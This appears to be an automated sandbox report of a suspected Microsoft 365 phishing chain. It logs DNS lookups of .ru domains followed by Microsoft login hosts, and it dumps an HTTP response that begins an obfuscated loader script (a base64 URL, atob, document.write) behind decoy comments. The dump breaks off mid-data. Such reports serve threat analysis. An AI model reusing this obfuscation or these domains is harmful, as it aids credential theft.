                                                                                                                  Dec 19, 2024 11:42:51.124723911 CET5554453192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:42:51.261486053 CET53530091.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:51.261502028 CET53527141.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:51.261514902 CET53512151.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:51.262624979 CET53555441.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:51.269506931 CET53552621.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:51.269522905 CET53554381.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:53.308465958 CET5904653192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:42:53.308526993 CET5954053192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:42:53.370979071 CET5758153192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:42:53.371120930 CET5589153192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:42:53.446139097 CET53590461.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:53.447041988 CET53595401.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:53.508434057 CET53558911.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:53.508964062 CET53575811.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.868828058 CET5474153192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:42:54.869019032 CET5925353192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:42:55.005996943 CET53592531.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.006190062 CET53547411.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:03.839394093 CET53516031.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:15.542850971 CET6130153192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:43:15.543000937 CET6523053192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:43:16.012769938 CET53613011.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:16.012887001 CET53652301.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:19.309710026 CET5823953192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:43:19.309878111 CET5422453192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:43:19.312944889 CET6444853192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:43:19.313098907 CET6261753192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:43:19.454354048 CET53582391.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:19.454443932 CET53542241.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:19.728461981 CET53626171.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:21.814028978 CET5680753192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:43:21.814173937 CET6157153192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:43:21.952610016 CET53615711.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:22.899519920 CET53633211.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:23.934703112 CET6432353192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:43:23.934817076 CET6419553192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:43:26.719620943 CET5889053192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:43:26.719763041 CET5057953192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:43:26.857465982 CET53588901.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:26.857937098 CET53505791.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.764528036 CET5376153192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:43:29.764681101 CET6464553192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:43:29.902764082 CET53537611.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.906399012 CET53646451.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.174469948 CET4924053192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:43:32.174678087 CET5918653192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:43:40.282623053 CET138138192.168.2.16192.168.2.255
                                                                                                                  Dec 19, 2024 11:43:43.551673889 CET53614751.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:45.859342098 CET53525201.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:44:16.410229921 CET53585761.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:44:34.084187984 CET5231853192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:44:34.084383011 CET5699353192.168.2.161.1.1.1
                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Dec 19, 2024 11:42:47.153685093 CET192.168.2.161.1.1.10xc185Standard query (0)tt6l.xentore.ruA (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:47.154126883 CET192.168.2.161.1.1.10x9f46Standard query (0)tt6l.xentore.ru65IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:48.216562033 CET192.168.2.161.1.1.10xd3ffStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:48.216758966 CET192.168.2.161.1.1.10x5dc4Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:51.123836040 CET192.168.2.161.1.1.10xa783Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:51.123986006 CET192.168.2.161.1.1.10xdf52Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:51.124262094 CET192.168.2.161.1.1.10x3b70Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:51.124383926 CET192.168.2.161.1.1.10x4ec5Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:51.124689102 CET192.168.2.161.1.1.10xacaeStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:51.124723911 CET192.168.2.161.1.1.10x4b50Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:53.308465958 CET192.168.2.161.1.1.10x3e85Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:53.308526993 CET192.168.2.161.1.1.10x3b12Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:53.370979071 CET192.168.2.161.1.1.10x1120Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:53.371120930 CET192.168.2.161.1.1.10x776eStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:54.868828058 CET192.168.2.161.1.1.10x72e5Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:54.869019032 CET192.168.2.161.1.1.10x84a8Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:15.542850971 CET192.168.2.161.1.1.10x320fStandard query (0)bhksek6wvvvwbimyy5laubfcyybljagnzmidmiz0qxgan2jerxhfwo.ezmbsgzm.ruA (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:15.543000937 CET192.168.2.161.1.1.10x6f12Standard query (0)bhksek6wvvvwbimyy5laubfcyybljagnzmidmiz0qxgan2jerxhfwo.ezmbsgzm.ru65IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:19.309710026 CET192.168.2.161.1.1.10x796aStandard query (0)bhksek6wvvvwbimyy5laubfcyybljagnzmidmiz0qxgan2jerxhfwo.ezmbsgzm.ruA (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:19.309878111 CET192.168.2.161.1.1.10x5c61Standard query (0)bhksek6wvvvwbimyy5laubfcyybljagnzmidmiz0qxgan2jerxhfwo.ezmbsgzm.ru65IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:19.312944889 CET192.168.2.161.1.1.10xa45aStandard query (0)word.office.comA (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:19.313098907 CET192.168.2.161.1.1.10x53b5Standard query (0)word.office.com65IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:21.814028978 CET192.168.2.161.1.1.10x5035Standard query (0)www.microsoft365.comA (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:21.814173937 CET192.168.2.161.1.1.10xed4eStandard query (0)www.microsoft365.com65IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:23.934703112 CET192.168.2.161.1.1.10x4f16Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:23.934817076 CET192.168.2.161.1.1.10x5739Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:26.719620943 CET192.168.2.161.1.1.10xf88bStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:26.719763041 CET192.168.2.161.1.1.10xf90aStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:29.764528036 CET192.168.2.161.1.1.10xb726Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:29.764681101 CET192.168.2.161.1.1.10x617dStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:32.174469948 CET192.168.2.161.1.1.10x2d69Standard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:32.174678087 CET192.168.2.161.1.1.10xbeabStandard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:44:34.084187984 CET192.168.2.161.1.1.10xebb8Standard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:44:34.084383011 CET192.168.2.161.1.1.10x1b9eStandard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Dec 19, 2024 11:42:47.608551979 CET1.1.1.1192.168.2.160xc185No error (0)tt6l.xentore.ru172.67.131.254A (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:47.608551979 CET1.1.1.1192.168.2.160xc185No error (0)tt6l.xentore.ru104.21.4.107A (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:47.612098932 CET1.1.1.1192.168.2.160x9f46No error (0)tt6l.xentore.ru65IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:48.353580952 CET1.1.1.1192.168.2.160xd3ffNo error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:48.353620052 CET1.1.1.1192.168.2.160x5dc4No error (0)www.google.com65IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:51.261486053 CET1.1.1.1192.168.2.160x3b70No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:51.261486053 CET1.1.1.1192.168.2.160x3b70No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:51.261502028 CET1.1.1.1192.168.2.160xa783No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:51.261502028 CET1.1.1.1192.168.2.160xa783No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:51.261502028 CET1.1.1.1192.168.2.160xa783No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:51.261502028 CET1.1.1.1192.168.2.160xa783No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:51.261514902 CET1.1.1.1192.168.2.160xacaeNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:51.261514902 CET1.1.1.1192.168.2.160xacaeNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:51.262624979 CET1.1.1.1192.168.2.160x4b50No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:51.269506931 CET1.1.1.1192.168.2.160x4ec5No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:53.446139097 CET1.1.1.1192.168.2.160x3e85No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:53.446139097 CET1.1.1.1192.168.2.160x3e85No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:53.447041988 CET1.1.1.1192.168.2.160x3b12No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:53.508964062 CET1.1.1.1192.168.2.160x1120No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:53.508964062 CET1.1.1.1192.168.2.160x1120No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:53.508964062 CET1.1.1.1192.168.2.160x1120No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:53.508964062 CET1.1.1.1192.168.2.160x1120No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:55.005996943 CET1.1.1.1192.168.2.160x84a8No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:55.006190062 CET1.1.1.1192.168.2.160x72e5No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:42:55.006190062 CET1.1.1.1192.168.2.160x72e5No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:16.012769938 CET1.1.1.1192.168.2.160x320fNo error (0)bhksek6wvvvwbimyy5laubfcyybljagnzmidmiz0qxgan2jerxhfwo.ezmbsgzm.ru104.21.32.251A (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:16.012769938 CET1.1.1.1192.168.2.160x320fNo error (0)bhksek6wvvvwbimyy5laubfcyybljagnzmidmiz0qxgan2jerxhfwo.ezmbsgzm.ru172.67.139.11A (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:16.012887001 CET1.1.1.1192.168.2.160x6f12No error (0)bhksek6wvvvwbimyy5laubfcyybljagnzmidmiz0qxgan2jerxhfwo.ezmbsgzm.ru65IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:19.454354048 CET1.1.1.1192.168.2.160x796aNo error (0)bhksek6wvvvwbimyy5laubfcyybljagnzmidmiz0qxgan2jerxhfwo.ezmbsgzm.ru104.21.32.251A (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:19.454354048 CET1.1.1.1192.168.2.160x796aNo error (0)bhksek6wvvvwbimyy5laubfcyybljagnzmidmiz0qxgan2jerxhfwo.ezmbsgzm.ru172.67.139.11A (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:19.454443932 CET1.1.1.1192.168.2.160x5c61No error (0)bhksek6wvvvwbimyy5laubfcyybljagnzmidmiz0qxgan2jerxhfwo.ezmbsgzm.ru65IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:19.728461981 CET1.1.1.1192.168.2.160x53b5No error (0)word.office.comhome-redirects.www.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:19.728461981 CET1.1.1.1192.168.2.160x53b5No error (0)home-redirects.www.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:19.842004061 CET1.1.1.1192.168.2.160xa45aNo error (0)word.office.comhome-redirects.www.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:19.842004061 CET1.1.1.1192.168.2.160xa45aNo error (0)home-redirects.www.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:21.952308893 CET1.1.1.1192.168.2.160x5035No error (0)www.microsoft365.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:21.952308893 CET1.1.1.1192.168.2.160x5035No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:21.952610016 CET1.1.1.1192.168.2.160xed4eNo error (0)www.microsoft365.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:21.952610016 CET1.1.1.1192.168.2.160xed4eNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:24.072098970 CET1.1.1.1192.168.2.160x5739No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:24.072169065 CET1.1.1.1192.168.2.160x4f16No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:26.857465982 CET1.1.1.1192.168.2.160xf88bNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:26.857465982 CET1.1.1.1192.168.2.160xf88bNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:26.857465982 CET1.1.1.1192.168.2.160xf88bNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:26.857937098 CET1.1.1.1192.168.2.160xf90aNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:26.857937098 CET1.1.1.1192.168.2.160xf90aNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:29.902764082 CET1.1.1.1192.168.2.160xb726No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:29.902764082 CET1.1.1.1192.168.2.160xb726No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:29.902764082 CET1.1.1.1192.168.2.160xb726No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:29.906399012 CET1.1.1.1192.168.2.160x617dNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:29.906399012 CET1.1.1.1192.168.2.160x617dNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:32.372112036 CET1.1.1.1192.168.2.160xbeabNo error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:43:32.469645977 CET1.1.1.1192.168.2.160x2d69No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:44:34.222183943 CET1.1.1.1192.168.2.160xebb8No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Dec 19, 2024 11:44:34.222292900 CET1.1.1.1192.168.2.160x1b9eNo error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  • tt6l.xentore.ru
                                                                                                                  • https:
                                                                                                                    • cdnjs.cloudflare.com
                                                                                                                    • challenges.cloudflare.com
                                                                                                                    • code.jquery.com
                                                                                                                    • bhksek6wvvvwbimyy5laubfcyybljagnzmidmiz0qxgan2jerxhfwo.ezmbsgzm.ru
                                                                                                                    • aadcdn.msftauth.net
                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.1649719172.67.131.2544436456C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-19 10:42:50 UTC650OUTGET /eH4dlw0/ HTTP/1.1
                                                                                                                  Host: tt6l.xentore.ru
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                  Sec-Fetch-Dest: iframe
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-12-19 10:42:50 UTC1236INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 19 Dec 2024 10:42:50 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: no-cache, private
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  vary: accept-encoding
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EeHFbWMKwrJBjkYfJ3MRCHDQaXkigSWeelX4Ll8j6UavMSjhFrnNytaNYZUTvppIKvaraAInTQSH3HMpQVhQ7iUVrXgXdgX459bBwcqG2KcQIlTYLNgGHii7vHRZdw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1102&min_rtt=1054&rtt_var=429&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1551&delivery_rate=2702087&cwnd=251&unsent_bytes=0&cid=72266cb217feddbe&ts=247&x=0"
                                                                                                                  Set-Cookie: XSRF-TOKEN=eyJpdiI6IkV0S1lyZWZiTFU2VzN0ZGwreWlxOHc9PSIsInZhbHVlIjoiUXE5U2VTNXdGeUprcGlPYzJaaGJRTVZDU1plK3Z2bm1BdGJqUmNLa08xM3h3eXR5RXZObXczQ0srQ0dzc2thdkFremdvM2Y3d1R4ZmdGTllKcmZDODM5QTZvT1I3R2E5WDQxM0EvSUxKZW5tMDUrNFE4VklRMzlRaFZsZ1R3NWEiLCJtYWMiOiIwMjc5MzZkODQ0YjU1Y2E2OTc3YzNhY2YxYWIzODE3Y2YzNDg4NzNiN2ZlMDU1YWIwZTFjM2RmZWZjYWJjYTU4IiwidGFnIjoiIn0%3D; expires=Thu, 19-Dec-2024 12:42:50 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                  2024-12-19 10:42:50 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 4e 6e 52 47 34 76 4b 31 52 57 55 46 70 32 56 56 68 48 62 58 6c 79 55 54 4a 6e 4e 31 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 59 6e 4e 4a 63 47 67 34 65 54 6c 75 4e 6d 35 31 52 48 46 69 62 58 4a 34 53 54 55 34 54 33 45 35 5a 30 45 78 64 55 64 45 63 6a 46 78 4b 32 6f 34 59 7a 64 34 63 55 45 31 61 58 6f 72 55 56 6c 59 64 6d 52 50 57 55 5a 36 62 55 31 78 54 30 78 7a 56 30 5a 4a 5a 6a 64 57 63 30 39 6f 51 31 70 59 64 33 67 78 55 32 70 58 4b 31 59 33 61 44 46 4f 53 6c 52 6e 65 58 56 69 4e 32 52 6d 52 6e 56 58 56 46 42 32 52 32 5a 4a 62 32 4e 61 57 6b 52 61 63 47 68 73 63 48 42 76 5a 32 38 34 64 46 4a 69 5a 6b 68 71 57 48 4a 79 55 6d 38
                                                                                                                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlNnRG4vK1RWUFp2VVhHbXlyUTJnN1E9PSIsInZhbHVlIjoiYnNJcGg4eTluNm51RHFibXJ4STU4T3E5Z0ExdUdEcjFxK2o4Yzd4cUE1aXorUVlYdmRPWUZ6bU1xT0xzV0ZJZjdWc09oQ1pYd3gxU2pXK1Y3aDFOSlRneXViN2RmRnVXVFB2R2ZJb2NaWkRacGhscHBvZ284dFJiZkhqWHJyUm8
                                                                                                                  2024-12-19 10:42:50 UTC1369INData Raw: 34 64 37 31 0d 0a 3c 21 2d 2d 20 44 6f 6e 26 23 30 33 39 3b 74 20 77 61 74 63 68 20 74 68 65 20 63 6c 6f 63 6b 3b 20 64 6f 20 77 68 61 74 20 69 74 20 64 6f 65 73 2e 20 4b 65 65 70 20 67 6f 69 6e 67 2e 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 53 75 63 63 65 73 73 20 69 73 20 67 65 74 74 69 6e 67 20 77 68 61 74 20 79 6f 75 20 77 61 6e 74 2c 20 68 61 70 70 69 6e 65 73 73 20 69 73 20 77 61 6e 74 69 6e 67 20 77 68 61 74 20 79 6f 75 20 67 65 74 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 55 64 44 5a 73 4c 6e 68 6c 62 6e 52 76 63 6d 55 75 63 6e 55 76 5a 55 67 30 5a 47 78 33 4d 43 38 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49
                                                                                                                  Data Ascii: 4d71... Don&#039;t watch the clock; do what it does. Keep going. --><script>/* Success is getting what you want, happiness is wanting what you get. */if(atob("aHR0cHM6Ly9UdDZsLnhlbnRvcmUucnUvZUg0ZGx3MC8=") == "nomatch"){document.write(decodeURI
                                                                                                                  2024-12-19 10:42:50 UTC1369INData Raw: 6a 57 56 4a 79 54 55 4e 31 63 6b 70 59 54 69 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 31 6c 53 63 6b 31 44 64 58 4a 4b 57 45 34 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 54 55 32 63 48 67 37 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 71 4c 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 33 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33
